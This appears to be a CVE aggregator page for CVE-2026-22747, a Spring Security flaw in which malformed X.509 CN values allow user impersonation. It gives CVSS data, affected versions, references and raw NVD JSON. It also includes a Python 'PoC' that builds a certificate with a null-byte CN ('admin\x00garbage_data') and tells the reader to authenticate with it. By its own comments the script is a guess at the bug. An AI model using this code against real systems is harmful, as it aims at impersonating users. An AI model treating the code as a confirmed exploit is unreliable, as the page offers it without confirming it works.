CVE-2026-22747

Description

Vulnerability in Spring Spring Security. SubjectX500PrincipalExtractor does not correctly handle certain malformed X.509 certificate CN values, which can lead to reading the wrong value for the username. In a carefully crafted certificate, this can lead to an attacker impersonating another user. This issue affects Spring Security: from 7.0.0 through 7.0.4.

CVSS Details

CVSS Score

6.8

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:vmware:spring_security:*:*:*:*:*:*:*:* - VULNERABLE

Spring Security 7.0.0

Spring Security 7.0.1

Spring Security 7.0.2

Spring Security 7.0.3

Spring Security 7.0.4

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
"""
PoC Concept for CVE-2026-22747
Demonstrates creating a malicious X.509 certificate with a malformed CN.
Note: This requires the target to be running a vulnerable version of Spring Security.
"""

from cryptography import x509
from cryptography.x509.oid import NameOID
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography.hazmat.primitives import serialization
import datetime

# Generate private key
private_key = rsa.generate_private_key(
    public_exponent=65537,
    key_size=2048,
)

# Define subject with a potentially malformed CN to trigger parsing issues
# The exact malformed pattern depends on the specific parsing bug in SubjectX500PrincipalExtractor
# Often involves special characters or encoding sequences that confuse the DN parser.
subject = issuer = x509.Name([
    x509.NameAttribute(NameOID.COUNTRY_NAME, u"US"),
    x509.NameAttribute(NameOID.STATE_OR_PROVINCE_NAME, u"CA"),
    x509.NameAttribute(NameOID.LOCALITY_NAME, u"San Francisco"),
    x509.NameAttribute(NameOID.ORGANIZATION_NAME, u"My Company"),
    # Attempting to inject a pattern that might be misinterpreted as a different user
    # For example, embedding a valid username followed by garbage that the parser ignores incorrectly
    x509.NameAttribute(NameOID.COMMON_NAME, u"admin\x00garbage_data"),
])

cert = x509.CertificateBuilder().subject_name(
    subject
).issuer_name(
    issuer
).public_key(
    private_key.public_key()
).serial_number(
    x509.random_serial_number()
).not_valid_before(
    datetime.datetime.utcnow()
).not_valid_after(
    datetime.datetime.utcnow() + datetime.timedelta(days=365)
).add_extension(
    x509.SubjectAlternativeName([x509.DNSName(u"localhost")]),
    critical=False,
).sign(private_key, hashes.SHA256())

# Write certificate and key to file
with open("malicious_cert.pem", "wb") as f:
    f.write(cert.public_bytes(serialization.Encoding.PEM))

with open("malicious_key.pem", "wb") as f:
    f.write(private_key.private_bytes(
        encoding=serialization.Encoding.PEM,
        format=serialization.PrivateFormat.TraditionalOpenSSL,
        encryption_algorithm=serialization.NoEncryption()
    ))

print("Malicious certificate generated: malicious_cert.pem")
print("Use this certificate to authenticate against the vulnerable Spring Security application.")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-22747
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-22747
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-22747/
[4] VulDB https://vuldb.com/cve/CVE-2026-22747
[5] https://spring.io/security/cve-2026-22747

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-22747", "sourceIdentifier": "[email protected]", "published": "2026-04-22T06:16:03.933", "lastModified": "2026-04-24T14:18:56.417", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vulnerability in Spring Spring Security. SubjectX500PrincipalExtractor does not correctly handle certain malformed X.509 certificate CN values, which can lead to reading the wrong value for the username. In a carefully crafted certificate, this can lead to an attacker impersonating another user.\nThis issue affects Spring Security: from 7.0.0 through 7.0.4."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 5.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-297"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:vmware:spring_security:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.0.0", "versionEndExcluding": "7.0.5", "matchCriteriaId": "0B8A5767-EB43-4E11-8E93-9324B70F7060"}]}]}], "references": [{"url": "https://spring.io/security/cve-2026-22747", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}